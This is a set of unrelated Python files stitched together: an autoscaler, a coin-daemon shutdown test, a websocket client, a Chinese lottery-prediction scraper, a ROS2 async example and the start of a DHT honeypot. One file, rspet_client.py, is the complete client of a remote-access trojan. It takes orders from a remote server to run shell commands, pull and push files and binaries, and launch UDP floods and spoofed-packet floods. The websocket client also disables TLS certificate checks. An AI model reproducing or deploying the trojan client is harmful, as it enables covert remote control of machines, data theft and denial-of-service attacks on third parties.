def remove_vm(self, uuid=None):
if uuid is None:
vms = sorted(self._autoscaling_vm(), key=lambda x: x['name'])
if len(vms) == 0:
return
for vm in vms:
if not vm['active']:
uuid = vm['uuid']
name = vm['name']
break
else:
name = vms[-1]['name']
uuid = vms[-1]['uuid']
else:
name = self._status.data['vm'][uuid]['name']
self._status.set_info(catalog.OK_REMOVING, name=name)
self._client.remove_vm(uuid, self._config.data['tenant']['lb_rule_uuid'])
self._status.remove_vm(uuid)
self._status.init_status()
self._status.set_info(catalog.OK_REMOVED, name=name)
print_info("remove the vm: name={}, uuid={}".format(name, uuid))
def clean_vm(self):
for vm in self._autoscaling_vm():
if not vm['active']:
self.remove_vm(vm['uuid'])
def _get_vm_data(self, uuid):
vm = self._client.get_vm_data(uuid)
print_info("uuid={}, data={}".format(uuid, vm))
return vm
def _get_vm_usage(self, uuid):
usage = [ x for x in self._status.data['status'][uuid] if x[1] is not None ]
print_info("uuid={}, usage={}".format(uuid, usage))
return usage
def calculate_usage(self):
total_usage = 0.0
total_count = 0
vms = self._available_vm()
for uuid, vm in vms.items():
target = self._get_vm_usage(uuid)
total_count += len(target)
total_usage += sum([ x[1] for x in target ])
if total_count == 0:
self._status.set_info(catalog.OK_NO_DATA)
self._print_debug("There's not any usage")
return
average = round(total_usage / total_count, 1)
self._status.set_info(catalog.OK_AVERAGE, average=average)
if total_count == ( USAGE_COUNT * len(vms) ):
if average >= self._config.data['autoscaling']['upper_limit']:
self.create_vm()
if average <= self._config.data['autoscaling']['lower_limit']:
self.remove_vm()
self._status.data['average'] = average
def run(self):
self.load_status()
while True:
begin_time = time.time()
if self.load_config():
self.clean_vm()
self.calculate_usage()
interval = INTERVAL - ( time.time() - begin_time )
if interval > 0:
time.sleep(interval)
if __name__ == '__main__':
# Options
parser = ArgumentParser()
parser.add_argument("-d", "--debug", action="store_true", default=False, help="Debug mode")
parser.add_argument("-c", "--config", type=str, default=CONFIG_FILE, help="Config file")
parser.add_argument("-s", "--status", type=str, default=STATUS_FILE, help="Status file")
parser.add_argument("-P", "--prefix", type=str, default=VM_PREFIX, help="VM prefix. Default: {}".format(VM_PREFIX))
args = parser.parse_args()
#
logger = get_logger()
try:
# Run AutoScalingController
controller = AutoScalingController(args.config, args.status, args.prefix, args.debug)
controller.run()
except KeyboardInterrupt:
del controller
time.sleep(0.1)
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Copyright (c) 2021 The Vivuscoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test vivuscoind shutdown."""
from test_framework.test_framework import VivuscoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(VivuscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
subscribe_client.py
|
import ssl
import threading
import time
import websocket # pip3 install websocket_client
websocket.enableTrace(True)
def on_wss_msg(evt):
print(evt)
class SubscribeClient(websocket.WebSocketApp):
def __init__(self, url, on_wss_open, on_wss_msg):
self.url = url
self.reconnect_intv_sec = 60
super().__init__(url=url,
on_open=on_wss_open,
on_message=on_wss_msg,
on_error=self.on_wss_error,
on_close=self.on_wss_close)
def on_wss_open(self):
print(self.__class__.__name__ + ': on_wss_open')
def on_wss_cont_message(self, msg, cont):
print(self.__class__.__name__ + ': on_wss_cont_message')
def on_wss_error(self, evt):
print(self.__class__.__name__ + ': on_wss_error: msg = ' + str(evt))
print(evt)
def on_wss_close(self):
print(self.__class__.__name__ + ': on_wss_close')
def do_start(self):
try:
while True:
print('Starting SubscribeClient url = ' + self.url)
self.run_forever(ping_timeout=30, sslopt={"cert_reqs": ssl.CERT_NONE})
print(f'Sleep {self.reconnect_intv_sec} seconds and connect again....')
time.sleep(self.reconnect_intv_sec)
except Exception as e:
print('SubscribeClient: run_forever exception ' + str(e))
def start(self):
threading.Thread(target=self.do_start).start()
|
start.py
|
# -*- coding:utf-8 -*-
import gevent
from gevent import monkey
monkey.patch_all()
import os
from settings import DAYS_DICT, avoid_experts_db, LOTTERY_DICT_2, DATA_FILE, \
miss_urls_db, SETUP_FILE, BASE_DIR, saved_db, REAL, SETUP_TEMPLATE
os.chdir(BASE_DIR)
import signal
from multiprocessing import Process
from dataB import auto_begin as abg
from proxy.clear_proxies import clear_proxies_db
from proxy.get_proxy import GetProxies
from tools.send_mail import SendMail
from tools.auto_analyse_data import AnalyseData
from tools.common import *
from tools.auto_check_articles_list import CheckArticlesList as CAL
from tools.logger import Logger
from dataP.auto_begin import ExpertDataBegin as EB
logger = Logger(logger=__name__).getlog()
process_flag = 0
normal_main_process_time_delta = 1800
abnormal_main_process_time_delta = 300
hostname = os.popen('hostname').read()[:-1]
def get_work_times():
content = get_json_content(SETUP_FILE)
common_times = content['common_actions_time']
real_times = content['real_actions_time']
test_times = content['test_actions_time']
se_times = content['start_end_times']
actions_times = real_times if REAL == 1 else test_times
actions_times.update(se_times)
actions_times.update(common_times)
return actions_times
def start_ctrl(lottery, now_stage, work_times):
logger.info('上班了,上班了!')
data_file = DATA_FILE % (time.strftime('%Y-%m-%d'), lottery, now_stage)
sm = SendMail(data_file)
logger.info('主机:%s 彩票:%s 期数:%s 数据文件:%s' % (hostname, lottery, now_stage, data_file))
sm.send_flush(now_time() + ' 主机:%s, 彩票:%s, 期数:%s 数据文件:%s' % (hostname, lottery, now_stage, data_file))
ad = AnalyseData(lottery, now_stage, data_file)
global process_flag
process_flag = 1
while 1:
bg = EB(lottery)
for key in work_times:
if time.strftime('%H:%M') == work_times[key]:
if key == "end_time": # 今天结束了
logger.info('下班,明天是个好日子!!')
process_flag = 0
sm.send_flush('%s %s' % (now_time(), hostname) + ' 下班,明天是个好日子!!')
os.kill(os.getpid(), signal.SIGKILL)
# 开始获取代理
if key == 'get_lotteries_data':
logger.info('开始获取往期的开奖数据。')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 开始获取往期的开奖数据。')
bag = abg.Begin(lottery) # 获取往期的开奖数据
bag.begin()
if key == 'get_proxies':
logger.info('开始获取代理。')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 开始获取代理!')
clear_proxies_db()
gp = GetProxies()
gp.start()
# 开始获取本期的专家
if key == 'get_the_next_stage_experts':
logger.info('开始获取下期专家!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 开始获取下期专家!')
bg.get_experts()
# 获取本期的所有专家的预测数据url列表
if key == 'get_the_next_stage_experts_articles_list':
logger.info('开始获取下期专家列表!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 开始获取下期专家列表!')
bg.get_predict_urls()
# 再次开始获取本期的专家
if key == 'get_the_next_stage_experts_again':
logger.info('再次获取下期专家!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 再次获取下期专家!')
bg.get_experts()
# 获取本期的所有专家的预测数据url列表-补救措施
if key == 'get_the_next_stage_experts_articles_list_again':
logger.info('再次获取下期专家的预测文章列表!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 再次获取下期专家的预测文章列表!')
bg.get_predict_urls()
# 获取本期的所有专家的预测数据url列表-补救措施
if key == 'get_the_next_stage_experts_articles_list_third':
logger.info('三次获取下期专家的预测文章列表!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 三次获取下期专家的预测文章列表!')
bg.begin_get_predict_urls(1)
# 获取当前待开奖的预测数据
if key == 'get_the_next_stage_experts_all_predict_data':
logger.info('开始获取专家的预测数据!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 开始获取专家的预测数据!')
bg.get_predict_data()
# 获取当前待开奖的预测数据-补救措施
if key == 'get_the_next_stage_experts_all_predict_data_again':
logger.info('再次获取专家的所有预测数据!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 再次获取专家的所有预测数据!')
bg.get_predict_data()
if key == 'get_proxies_again':
logger.info('再次获取代理。')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 开始获取代理!')
clear_proxies_db()
gp = GetProxies()
gp.start()
if key == 'check_the_next_stage_experts_articles_list':
logger.info('检查所有专家的文章列表是否有漏爬!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 检查所有专家的文章列表是否有漏爬!')
cal = CAL(LOTTERY_DICT_2[lottery], now_stage)
cal.start_check()
bg.get_predict_urls(1)
if key == 'get_the_next_stage_experts_articles_list_fourth':
logger.info('四次获取下期专家的预测文章列表。')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 四次获取下期专家的预测文章列表!')
bg.begin_get_predict_urls(1)
if key == 'get_the_next_stage_experts_articles_list_fifth':
logger.info('五次获取下期专家的预测文章列表!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 五次获取下期专家的预测文章列表!')
bg.begin_get_predict_urls(1)
if key == 'get_the_next_stage_experts_all_predict_data_third':
logger.info('三次获取专家的预测数据!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 三次获取专家的预测数据!')
bg.get_predict_data()
if key == 'get_the_next_stage_experts_all_predict_data_fourth':
logger.info('四次获取专家的预测数据!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 四次获取专家的预测数据!')
bg.get_predict_data()
# 获取当前期的专家列表,并记入DATA_FILE
if key == 'get_the_next_stage_experts_list':
logger.info('开始分析下期的“预测专家列表”!')
sm.send_flush('%s %s %s' % (now_time(), hostname, data_file) + ' 开始分析下期的“预测专家列表”!')
ad.start_analyse()
# 获取当前期的专家们的预测数据
if key == 'get_the_next_stage_experts_predict_data':
logger.info('开始获取下期的“专家预测数据”!')
sm.send_flush('%s %s %s' % (now_time(), hostname, data_file) + ' 开始获取下期的“专家预测数据”!')
ad.get_the_next_experts_predict_kill_data()
# 开始发送邮件
if key == 'send_mail':
logger.info('发送邮件!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 发送邮件!')
sm.send_mail()
# 开始发送第二次确认邮件
if key == 'send_mail_again':
logger.info('发送确认邮件!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 发送确认邮件!')
sm.send_mail()
if key == 'clear_database':
logger.info('开始清除数据库:%s!' %
([lpdb[lottery + '_experts'], avoid_experts_db, miss_urls_db['articles_list']]))
try:
lpdb[lottery + '_experts'].drop()
lpdb[lottery + '_right_location'].drop()
saved_db['the_next_stage_saved_predict_urls'].drop()
avoid_experts_db.drop()
remove_browser_tmp('/tmp')
miss_urls_db['articles_list'].drop()
logger.info('成功清除数据库:%s!' %
([lpdb[lottery + '_experts'], avoid_experts_db, miss_urls_db['articles_list']]))
sm.send_flush('%s %s' % (now_time(), hostname) + ' 开始清除数据库完成!!')
except Exception as e:
logger.error(e)
time.sleep(15) # 为了防止某些操作一分钟内执行了两次
logger.info('休息中...')
time.sleep(50)
def start():
if not os.path.exists(os.path.dirname(DATA_FILE)):
os.mkdir(os.path.dirname(DATA_FILE))
while 1:
work_times = get_work_times()
logger.info(work_times)
start_time = work_times['start_time']
end_time = work_times['end_time']
avoid_whole_point()
today = int(time.strftime("%w"))
if today in [1, 3, 6]:
lottery = 'dlt'
elif today in [0, 2, 4]:
lottery = 'ssq'
else:
lottery = 'ggl'
logger.info('今天星期%s,开奖:%s!!!' % (DAYS_DICT[time.strftime('%w')], LOTTERY_DICT_2[lottery]))
if lottery != 'ggl':
if not process_flag and (start_time[:2] <= time.strftime('%H') and time.strftime('%H:%M') <= end_time):
now_stage = get_the_next_stage(lottery)
p1 = Process(target=start_ctrl, args=(lottery, now_stage, work_times))
p1.start()
p1.join()
if not process_flag:
logger.info('工人已经下班了!')
if process_flag:
time.sleep(normal_main_process_time_delta)
else:
time.sleep(abnormal_main_process_time_delta)
# TODO 删除tmp目录中selenium产生的文件夹
def first_run(data):
# TODO
# 1. 各种条件判断,包括安装所需库,软件环境判断,以及当前work_dir
# 2. 复制setup_template.json -> setup.json
# 3. 提示修改邮箱密码,收/发件人
for lottery in ['ssq', 'dlt']:
bag = abg.Begin(lottery) # 获取往期的开奖数据
bag.begin()
mail_sender, mail_password = set_mail_sender()
mail_receivers = set_mail_receivers()
cjw_account, cjw_password = set_cjw_account()
data['mail_options']['sender'] = mail_sender
data['mail_options']['password'] = mail_password
data['mail_options']['receivers'] = mail_receivers
data['cjw_options']['account'] = cjw_account
data['cjw_options']['password'] = cjw_password
data['run_times'] = 1
with open(SETUP_FILE, 'w', encoding='utf-8') as f:
json.dump(data, f)
def other_test():
while 1:
bg = EB('ssq')
bg.get_experts()
bg.get_predict_urls(1)
bg.get_predict_data()
time.sleep(2400)
if __name__ == '__main__':
if not os.path.exists(SETUP_FILE):
if os.name == 'nt':
os.system('xcopy %s %s' % (SETUP_TEMPLATE, SETUP_FILE))
else:
os.system('cp -f %s %s' % (SETUP_TEMPLATE, SETUP_FILE))
with open(SETUP_FILE, 'r', encoding='utf-8') as f:
content = json.load(f)
is_first_run = content['run_times'] # 若setup.json文件中的run_times为0,则认为需要进行第一次爬取
if not is_first_run:
first_run(content)
start()
|
rspet_client.py
|
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
"""rspet_client.py: RSPET's Client-side script."""
from __future__ import print_function
from sys import exit as sysexit, argv
from time import sleep
from subprocess import Popen, PIPE
from multiprocessing import Process, freeze_support
from socket import socket, IPPROTO_UDP, IPPROTO_RAW, SOCK_DGRAM, SOCK_STREAM, SOCK_RAW, AF_INET
from socket import error as sock_error
from socket import SHUT_RDWR
import ssl
__author__ = "Kolokotronis Panagiotis"
__copyright__ = "Copyright 2016, Kolokotronis Panagiotis"
__credits__ = ["Kolokotronis Panagiotis", "Dimitris Zervas", "Lain Iwakura"]
__license__ = "MIT"
__version__ = "0.3.1"
__maintainer__ = "Kolokotronis Panagiotis"
def exponential_backoff(c_factor):
"""Calculate backoff time for reconnect."""
return int(((2**c_factor)-1)/2)
def sys_info():
"""Get platform info."""
import platform
sys_info_tup = platform.uname()
return (sys_info_tup[0], sys_info_tup[1])
def get_len(in_string, max_len):
"""Calculate string length, return as a string with trailing 0s.
Keyword argument(s):
in_string -- input string
max_len -- length of returned string
"""
tmp_str = str(len(in_string))
len_to_return = tmp_str
for _ in range(max_len - len(tmp_str)):
len_to_return = '0' + len_to_return
return len_to_return
def udp_flood_start(target_ip, target_port, msg):
"""Create UDP packet and send it to target_ip, target_port."""
flood_sock = socket(AF_INET, SOCK_DGRAM)
while True:
flood_sock.sendto(bytes(msg), (target_ip, target_port))
sleep(0.01)
def udp_spoof_pck(dest_ip, dest_port, source_ip, source_port, payload):
"""Create and return a spoofed UDP packet.
Keyword argument(s):
dest_ip -- the desired destination ip
dest_port -- the desired destination port
source_ip -- the desired source ip
source_port -- the desired source port
"""
from pinject import UDP, IP
udp_header = UDP(source_port, dest_port, payload).pack(source_ip, dest_ip)
ip_header = IP(source_ip, dest_ip, udp_header, IPPROTO_UDP).pack()
return ip_header+udp_header+payload
def udp_spoof_start(target_ip, target_port, spoofed_ip, spoofed_port, payload):
"""Spoof a packet and send it to target_ip, target_port.
Keyword argument(s):
target_ip -- the desired destination ip
target_port -- the desired destination port
spoofed_ip -- the desired source ip
spoofed_port -- the desired source port
"""
spoofed_packet = udp_spoof_pck(target_ip, target_port, spoofed_ip,
spoofed_port, payload)
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)
while True:
sock.sendto(spoofed_packet, (target_ip, target_port))
sleep(0.01)
class Client(object):
"""Class for Client."""
def __init__(self, addr, port=9000):
self.sock = socket(AF_INET, SOCK_STREAM)
try:
cntx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
except AttributeError: # All PROTOCOL consts are merged on TLS in Python2.7.13
cntx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.sock = cntx.wrap_socket(self.sock)
self.address = addr
self.port = int(port)
self.quit_signal = False
self.version = ("%s-%s" %(__version__, "full"))
self.plugins = {}
self.comm_dict = {
'00000' : 'killMe',
'00001' : 'getFile',
'00002' : 'getBinary',
'00003' : 'sendFile',
'00004' : 'sendBinary',
'00005' : 'udpFlood',
'00006' : 'udpSpoof',
'00007' : 'command',
'00008' : 'KILL',
'00009' : 'loadPlugin',
'00010' : 'unloadPlugin'
}
self.comm_swtch = {
'killMe' : self.kill_me,
'getFile' : self.get_file,
'getBinary' : self.get_binary,
'sendFile' : self.send_file,
'sendBinary': self.send_binary,
'udpFlood' : self.udp_flood,
'udpSpoof' : self.udp_spoof,
'command' : self.run_cm,
'loadPlugin': self.load_plugin,
'unloadPlugin': self.unload_plugin
}
def loop(self):
"""Client's main body. Accept and execute commands."""
while not self.quit_signal:
en_data = self.receive(5)
try:
en_data = self.comm_dict[en_data]
except KeyError:
if en_data == '':
self.reconnect()
continue
self.comm_swtch[en_data]()
self.sock.shutdown(SHUT_RDWR)
self.sock.close()
def connect(self):
"""Connect to the Server."""
try:
self.sock.connect((self.address, self.port))
###Send Version###
msg_len = get_len(self.version, 2) # len is 2-digit (i.e. up to 99 chars)
en_stdout = self.send(msg_len)
en_stdout = self.send(self.version)
##################
sys_type, sys_hname = sys_info()
###Send System Type###
msg_len = get_len(sys_type, 2) # len is 2-digit (i.e. up to 99 chars)
en_stdout = self.send(msg_len)
en_stdout = self.send(sys_type)
######################
###Send Hostname###
if sys_hname == "":
sys_hname = "None"
msg_len = get_len(sys_hname, 2) # len is 2-digit (i.e. up to 99 chars)
en_stdout = self.send(msg_len)
en_stdout = self.send(sys_hname)
###################
except sock_error, ValueError:
raise sock_error
return 0
def reconnect(self):
"""Attempt to reconnect after connection loss."""
# Take an exponential backoff-ish approach
c_factor = 0
connected = False
while not connected:
try:
self.connect()
except sock_error:
sleep(exponential_backoff(c_factor))
c_factor += 1
else:
connected = True
def send(self, data):
"""Send data to Server."""
r_code = 0
try:
self.sock.send(data)
except sock_error:
r_code = 1
self.reconnect()
return r_code
def receive(self, size):
"""Receive data from Server."""
data = self.sock.recv(size)
if data == '':
self.reconnect()
raise sock_error
return data
def kill_me(self):
"""Close socket, terminate script's execution."""
self.quit_signal = True
def run_cm(self):
"""Get command to run from server, execute it and send results back."""
command_size = self.receive(13)
command = self.receive(int(command_size))
comm = Popen(command, shell=True, stdout=PIPE, stderr=PIPE, stdin=PIPE)
stdout, stderr = comm.communicate()
if stderr:
decode = stderr.decode('UTF-8')
elif stdout:
decode = stdout.decode('UTF-8')
else:
decode = 'Command has no output'
len_decode = get_len(decode, 13)
en_stdout = self.send(len_decode)
if en_stdout == 0:
en_stdout = self.send(decode)
return 0
def get_file(self):
"""Get file name and contents from server, create file."""
exit_code = 0
fname_length = self.receive(3) # Filename length up to 999 chars
fname = self.receive(int(fname_length))
try:
file_to_write = open(fname, 'w')
stdout = 'fcs'
except IOError:
stdout = 'fna'
exit_code = 1
en_stdout = self.send(stdout)
else:
en_stdout = self.send(stdout)
if en_stdout == 0:
f_size = self.receive(13) # File size up to 9999999999999 chars
en_data = self.receive(int(f_size))
file_to_write.write(en_data)
file_to_write.close()
stdout = "fsw"
en_stdout = self.send(stdout)
else:
file_to_write.close()
return exit_code
def get_binary(self):
"""Get binary name and contents from server, create binary."""
exit_code = 0
bname_length = self.receive(3) # Filename length up to 999 chars
bname = self.receive(int(bname_length))
try:
bin_to_write = open(bname, 'wb')
stdout = 'fcs'
except IOError:
stdout = 'fna'
exit_code = 1
en_stdout = self.send(stdout)
else:
en_stdout = self.send(stdout)
if en_stdout == 0:
b_size = self.receive(13) # Binary size up to 9999999999999 symbols
en_data = self.receive(int(b_size))
bin_to_write.write(en_data)
bin_to_write.close()
stdout = "fsw"
en_stdout = self.send(stdout)
else:
bin_to_write.close()
return exit_code
def send_file(self):
"""Get file name from server, send contents back."""
exit_code = 0
fname_length = self.receive(3) # Filename length up to 999 chars
fname = self.receive(int(fname_length))
try:
file_to_send = open(fname, 'r')
stdout = 'fos'
except IOError:
stdout = 'fna'
exit_code = 1
en_stdout = self.send(stdout)
else:
en_stdout = self.send(stdout)
if en_stdout == 0:
file_cont = file_to_send.read()
file_to_send.close()
stdout = get_len(file_cont, 13)
en_stdout = self.send(stdout)
if en_stdout == 0:
stdout = file_cont
en_stdout = self.send(stdout)
else:
file_to_send.close()
return exit_code
def send_binary(self):
"""Get binary name from server, send contents back."""
exit_code = 0
bname_length = self.receive(3) # Filename length up to 999 chars
bname = self.receive(int(bname_length))
try:
bin_to_send = open(bname, 'rb')
stdout = 'fos'
except IOError:
stdout = 'fna'
exit_code = 1
en_stdout = self.send(stdout)
else:
en_stdout = self.send(stdout)
if en_stdout == 0:
bin_cont = bin_to_send.read()
bin_to_send.close()
stdout = get_len(bin_cont, 13)
en_stdout = self.send(stdout)
if en_stdout == 0:
stdout = bin_cont
en_stdout = self.send(stdout)
else:
bin_to_send.close()
return exit_code
def udp_flood(self):
"""Get target ip and port from server, start UPD flood wait for 'KILL'."""
en_data = self.receive(3) # Max ip+port+payload length 999 chars
en_data = self.receive(int(en_data))
en_data = en_data.split(":")
target_ip = en_data[0]
target_port = int(en_data[1])
msg = en_data[2]
proc = Process(target=udp_flood_start, args=(target_ip, target_port, msg))
proc.start()
killed = False
while not killed:
en_data = self.receive(5)
try:
en_data = self.comm_dict[en_data]
except KeyError:
continue
if en_data == 'KILL':
proc.terminate()
killed = True
return 0
def udp_spoof(self):
"""Get target/spoofed ip and port from server, start UPD spoof wait for 'KILL'."""
en_data = self.receive(3) # Max ip+port+spoofedip+spoofed port+payload length 999 chars
en_data = self.receive(int(en_data))
en_data = en_data.split(":")
target_ip = en_data[0]
target_port = int(en_data[1])
spoofed_ip = en_data[2]
spoofed_port = int(en_data[3])
payload = en_data[4].encode('UTF-8')
proc = Process(target=udp_spoof_start, args=(target_ip, target_port,
spoofed_ip, spoofed_port,
payload))
proc.start()
killed = False
while not killed:
en_data = self.receive(5)
try:
en_data = self.comm_dict[en_data]
except KeyError:
continue
if en_data == 'KILL':
proc.terminate()
killed = True
return 0
def load_plugin(self):
"""Asyncronously load a plugin."""
en_data = self.receive(3) # Max plugin name length 999 chars
en_data = self.receive(int(en_data))
try:
self.plugins[en_data] = __import__(en_data)
self.send("psl")
except ImportError:
self.send("pnl")
def unload_plugin(self):
"""Asyncronously unload a plugin."""
en_data = self.receive(3) # Max plugin name length 999 chars
en_data = self.receive(int(en_data))
try:
del self.loaded_plugins[en_data]
except ImportError:
pass
class PluginMount(type):
def __init__(cls, name, base, attr):
"""Called when a Plugin derived class is imported
Gathers all methods needed from __cmd_states__ to __server_cmds__"""
tmp = cls()
for fn in cls.__client_cmds__:
# Load the function (if its from the current plugin) and see if
# it's marked. All plugins' commands are saved as function names
# without saving from which plugin they come, so we have to mark
# them and try to load them
if cls.__client_cmds__ is not None:
continue
try:
f = getattr(tmp, fn)
if f.__is_command__:
cls.__server_cmds__[fn] = f
except AttributeError:
pass
class Plugin(object):
"""Plugin class (to be extended by plugins)"""
__metaclass__ = PluginMount
__client_cmds__ = {}
# Plugin decorator
def command(fn):
Plugin.__client_cmds__[fn.__name__] = None
return fn
def main():
"""Main function. Handle object instances."""
try:
rhost = argv[1]
except IndexError:
sysexit()
try:
myself = Client(rhost, argv[2])
except IndexError:
myself = Client(rhost)
try:
myself.connect()
except sock_error:
myself.reconnect()
myself.loop()
#Start Here!
if __name__ == '__main__':
freeze_support()
Process(target=main).start()
|
service.py
|
import asyncio
import itertools
import threading
import time
import rclpy
from rclpy.callback_groups import ReentrantCallbackGroup
from rclpy.executors import SingleThreadedExecutor
from rclpy.node import Node
from std_srvs.srv import SetBool
import asyncx
import asyncx_ros2
_thread = asyncx.EventLoopThread()
SERVICE_NAME = "example_add"
class NodeBase(Node):
def __init__(self, node_name: str) -> None:
super().__init__(node_name)
self._name = node_name
self._thread = threading.Thread(target=self._spin)
self._executor = SingleThreadedExecutor()
def _spin(self) -> None:
rclpy.spin(self, executor=self._executor)
def start(self) -> None:
self._thread.start()
def stop(self) -> None:
print(f"Stopping node: {self._name}")
self._executor.shutdown(timeout_sec=0.1)
class Server(NodeBase):
def __init__(self) -> None:
super().__init__("server")
self._server = self.create_service(
SetBool,
SERVICE_NAME,
self._set_bool,
callback_group=ReentrantCallbackGroup(),
)
self._counter = itertools.count()
@asyncx_ros2.wrap_as_ros_coroutine(_thread.get_loop)
async def _set_bool(
self, request: SetBool.Request, response: SetBool.Response
) -> SetBool.Response:
stime = time.time()
val = next(self._counter)
self.get_logger().info(f"counter={val}, get request")
await asyncio.sleep(1.0)
elapsed = time.time() - stime
self.get_logger().info(f"counter={val}, return response (elapsed: {elapsed})")
return response
class Client(NodeBase):
def __init__(self) -> None:
super().__init__("client")
self._client = self.create_client(
SetBool,
SERVICE_NAME,
callback_group=ReentrantCallbackGroup(),
)
self._timer = self.create_timer(
0.5,
self.timer_callback,
callback_group=ReentrantCallbackGroup(),
)
self._counter = itertools.count()
def run(self) -> None:
executor = SingleThreadedExecutor()
rclpy.spin(self, executor=executor)
async def _get_request(self, val: int) -> SetBool.Request:
request = SetBool.Request()
request.data = val % 2 == 0
await asyncio.sleep(1.0)
return request
@asyncx_ros2.wrap_as_ros_coroutine(_thread.get_loop)
async def timer_callback(self) -> None:
stime = time.time()
val = next(self._counter)
self.get_logger().info(f"counter={val}, timer callback")
request = await self._get_request(val)
self.get_logger().info(f"counter={val}, send request")
await asyncx_ros2.ensure_aio_future(self._client.call_async(request))
elapsed = time.time() - stime
self.get_logger().info(f"counter={val}, completed (elapsed: {elapsed})")
def main() -> None:
rclpy.init()
with _thread:
print("Press enter to stop")
server = Server()
client = Client()
server.start()
client.start()
try:
input()
finally:
print("Terminating nodes")
client.stop()
server.stop()
server.destroy_node()
client.destroy_node()
rclpy.shutdown()
if __name__ == "__main__":
main()
|
honeypot.I.py
|
#!/usr/bin/env python
#
# This script is an experimental honeypot.
#
# Liang Wang @ Dept. Computer Science, University of Helsinki, Finland
# 2011.10.03
#
import os
import sys
import socket
import pickle
import time
import threading
import resource
from honeypot_bt import *
from khash import *
from bencode import bencode, bdecode
from common import *
from multiprocessing import *
BUCKET_LIMIT = 8
HONEYPOT_NAME = "TEST"
class Honeypot(object):
def __init__(self, id = None):
self._debug = False # Output extra info or not
self.id = id if id else newID() # Honeypot's ID
self.ip = get_myip() # my ip
self.port = get_port() # my listening port
self.btport = self.port + 0 # The port running BT protocol
self.krpc = KRPC() # Simple KRPC translator
self.buckets = [] # Bucket structure holding the known nodes
self.nodePool = {} # Dict of the nodes collected
self.addrPool = {} # Dict uses <ip,port> as its key
self.nodeQueue = Queue(0) # Queue of the nodes to scan
self.counter = 5 # How long to wait after a queue is empty
self.startTime = time.time() # Time start the honeypot
self.duplicates = 0 # How many duplicates among returned nodes
self.total = 1 # Total number of returned nodes
self.respondent = 0 # Number of respondent
self.honey = [] # Honey used to lure our prey
self.tn = 0 # Number of nodes in a specified n-bit zone
self.tnold = 0
self.tntold = 0
self.tnspeed = 0
self.ndist = 2**160-1
self.isock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.isock.bind( ("",self.port) )
self.isock_lock = threading.Lock()
pass
def add_to_bucket(self, node):
"""Add a node into the bucket, the interval is like this [x,y)"""
if not len(self.buckets):
self.buckets = [ [[0,2**160], []] ]
id = intify(node["id"])
bucket = None
# Find the proper bucket for the now node
for x in self.buckets:
r, nl = x
if id >= r[0] and id < r[1]:
bucket = x
break
# OK, find the bucket for the new node
if bucket:
r, nl = bucket
# If the bucket id full
if len(nl) >= BUCKET_LIMIT:
# if the new node 'near to me'?
if self.is_in_bucket(self.id, bucket):
# split the bucket
x, y = r
m = ((y-x)>>1) + x
new_bucket = [ [x,m], [] ]
bucket[0] = [m,y]
pos = self.buckets.index(bucket)
self.buckets.insert(pos, new_bucket)
for n in nl:
tid = intify(n["id"])
if tid < m:
nl.remove(n)
new_bucket[1].append(n)
# Recursion
self.add_to_bucket(node)
pass
# if the node is far from me and the bucket if full, drop it.
else:
pass
# OK, we have spare place for new nodes.
else:
nl.append(node)
pass
def remove_from_bucket(self, id, buckets):
"""Remove a node from a bucket"""
bucket = self.in_which_bucket(id, buckets)
node = self.is_in_bucket(id, bucket)
bucket[1].remove(node)
# if the bucket is empty, then merge with others
if len(bucket[1])==0 and len(buckets)>1:
x, y = bucket[0]
pos = buckets.index(bucket)
prev = max(pos-1,0)
next = min(pos+1,len(buckets)-1)
px, py = buckets[prev][0]
nx, ny = buckets[next][0]
if pos==prev or ( pos!=prev and (ny-nx)==(y-x) ):
buckets[next][0] = [x,ny]
elif pos==next or ( pos!=next and (py-px)==(y-x) ):
buckets[prev][0] = [px,y]
buckets.remove(bucket)
pass
def is_in_bucket(self, id, bucket):
"""Given the id and the bucket, check if the id is in the bucket"""
node = None
r, nl = bucket
for n in nl:
if id == n['id']:
node = n
break
return node
def in_which_bucket(self, id, buckets):
"""Given the id, check which bucket it is in"""
b = None
for bucket in buckets:
if self.is_in_bucket(id, bucket):
b = bucket
break
return b
def bootstrap(self):
"""Bootstrap myself"""
self.add_to_bucket({"id":self.id, "host":self.ip, "port":self.port})
self.findNode("router.bittorrent.com", 6881, self.id)
# Try to boot from local nodecache
if os.path.exists("nodescache"):
nl = pickle.load(open("nodescache","r"))
for n in nl:
self.findNode(n["host"], n["port"], self.id)
pass
def nearest(self, target, nl, limit=None):
